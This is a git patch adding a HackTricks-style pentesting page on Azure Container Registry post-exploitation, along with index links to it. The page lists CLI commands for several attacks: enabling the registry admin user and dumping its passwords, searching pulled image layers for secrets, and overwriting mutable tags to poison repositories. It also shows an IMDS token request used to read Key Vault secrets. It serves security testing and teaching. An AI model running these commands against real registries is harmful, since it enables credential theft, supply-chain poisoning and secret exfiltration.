From 703d37d265aadcab8474e1e158e4a85c2eda39d5 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 14 Jul 2026 13:45:39 +0000 Subject: [PATCH] Add content from: Pandora's Container Part 1: Unpacking Azure Container Securi... --- src/SUMMARY.md | 1 + src/pentesting-ci-cd/argocd-security.md | 1 + .../az-post-exploitation/README.md | 4 + ...az-container-registry-post-exploitation.md | 95 +++++++++++++++++++ .../az-services/az-container-registry.md | 4 + 5 files changed, 105 insertions(+) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1c854c6e05..cef1fc888f 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -526,6 +526,7 @@ - [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md) - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + - [Az - Container Registry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) diff --git a/src/pentesting-ci-cd/argocd-security.md b/src/pentesting-ci-cd/argocd-security.md index 4fb6104348..15d8dd97e4 100644 --- a/src/pentesting-ci-cd/argocd-security.md +++ b/src/pentesting-ci-cd/argocd-security.md @@ -241,3 +241,4 @@ Model that second parameter as a remote source and add custom sinks for `exec.Co - [Argo CD docs - metrics](https://argo-cd.readthedocs.io/en/latest/operator-manual/metrics/) - [Argo Helm - chart values reference](https://github.com/argoproj/argo-helm/blob/main/charts/argo-cd/README.md) - [Kustomize - Helm chart generator example](https://github.com/kubernetes-sigs/kustomize/blob/master/examples/chart.md) +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 52b7c1b91e..ed71bf4d61 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -6,4 +6,8 @@ az-azure-ai-foundry-post-exploitation.md {{#endref}} +{{#ref}} +az-container-registry-post-exploitation.md +{{#endref}} + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md new file mode 100644 index 0000000000..102d568315 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-container-registry-post-exploitation.md @@ -0,0 +1,95 @@ +# Az - Container Registry Post Exploitation + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Container Registry + +For more information about this service check: + +{{#ref}} +../az-services/az-container-registry.md +{{#endref}} + +### `Microsoft.ContainerRegistry/registries/listCredentials/action`, `Microsoft.ContainerRegistry/registries/write` + +An identity with ACR management-plane access can convert that access into **reusable Docker credentials**. If the **admin user** is disabled but the principal also has `registries/write`, enable it, recover the passwords, and authenticate directly against `.azurecr.io`. + +```bash +az acr show --resource-group --name --query adminUserEnabled +az acr update --resource-group --name --admin-enabled true +az acr credential show -n +docker login .azurecr.io -u -p +``` + +This is useful because the recovered credentials can be reused outside the Azure CLI to **list, pull, push, overwrite, and sometimes delete** registry content until the admin account is disabled or the passwords are rotated. + +### `Microsoft.ContainerRegistry/registries/pull/read` + +Use pull access for **repository reconnaissance** and **secret hunting** inside images. Review both the final container configuration and the historical filesystem layers because files copied in one layer may remain recoverable even if deleted later. + +```bash +az acr repository list -n +az acr repository show-tags -n --repository --detail +docker pull .azurecr.io/: + +container_id=$(docker create .azurecr.io/:) +docker cp "$container_id":/ ./extracted_container +docker rm "$container_id" +docker inspect .azurecr.io/: | jq -r '.[0].Config.Env[]?' +dive .azurecr.io/: +``` + +High-value targets include **environment variables**, **application configs**, **deployment scripts**, **certificates**, **access tokens**, and **connection strings**. For more ideas while reviewing layers, check the Docker forensics page: + +{{#ref}} +https://book.hacktricks.wiki/en/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.html +{{#endref}} + +### `Microsoft.ContainerRegistry/registries/push/write` + +Push access lets an attacker **poison trusted repositories** or **overwrite mutable tags** such as `latest`, `prod`, or `stable`. Any workload that still deploys by tag instead of digest may pull the attacker image on the next deployment, scale-out event, or restart. + +```bash +# Retag an existing local image for the target ACR + +docker tag : .azurecr.io/: +docker push .azurecr.io/: + +# If your workstation architecture differs from the target runtime, build for the consumer platform first + +docker buildx build --platform linux/amd64 -t .azurecr.io/: --load . +docker push .azurecr.io/: +``` + +Before replacing a tag, verify which repositories and tags are actually consumed by downstream workloads. **Digest-pinned** consumers (`@sha256:...`) are much harder to redirect than tag-based consumers. + +### `Microsoft.ContainerRegistry/registries/push/write`, `Microsoft.ContainerInstance/containerGroups/restart/action` + +If you can both **replace the image** used by a downstream container workload and **restart** that workload, the malicious entrypoint executes inside the target container's **network and managed identity context**. From there, the image can request tokens from IMDS and access Azure resources reachable by that workload identity. + +```bash +TOKEN=$(curl -s -H Metadata:true 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net' | jq -r .access_token) +curl -H "Authorization: Bearer $TOKEN" \ + 'https://.vault.azure.net/secrets/?api-version=7.4' +az container restart --resource-group --name +``` + +This turns an ACR tag overwrite into **code execution**, **secret theft**, or **lateral movement** inside any container consumer that trusts the modified tag and exposes a useful identity. + +### Related privesc path: ACR Tasks managed identities + +If you also have `Microsoft.ContainerRegistry/registries/tasks/write` and `Microsoft.ContainerRegistry/registries/runs/write`, move to the ACR privesc path and abuse the task's managed identity directly: + +{{#ref}} +../az-privilege-escalation/az-container-registry-privesc.md +{{#endref}} + +## References + +- [TrustedSec - Pandora's Container Part 1: Unpacking Azure Container Security](https://trustedsec.com/blog/pandoras-container-part-1-unpacking-azure-container-security) +- [Microsoft Learn - Azure Container Registry authentication](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication) +- [Microsoft Learn - az acr credential](https://learn.microsoft.com/en-us/cli/azure/acr/credential?view=azure-cli-latest) +- [Microsoft Learn - az acr repository](https://learn.microsoft.com/en-us/cli/azure/acr/repository?view=azure-cli-latest) +- [Microsoft Learn - ACR Tasks YAML reference](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-tasks-reference-yaml) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md index e6584d609f..09750732be 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md +++ b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md @@ -161,6 +161,10 @@ az acr cache show --name --registry ../az-privilege-escalation/az-container-registry-privesc.md {{#endref}} +{{#ref}} +../az-post-exploitation/az-container-registry-post-exploitation.md +{{#endref}} + ## References - [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli)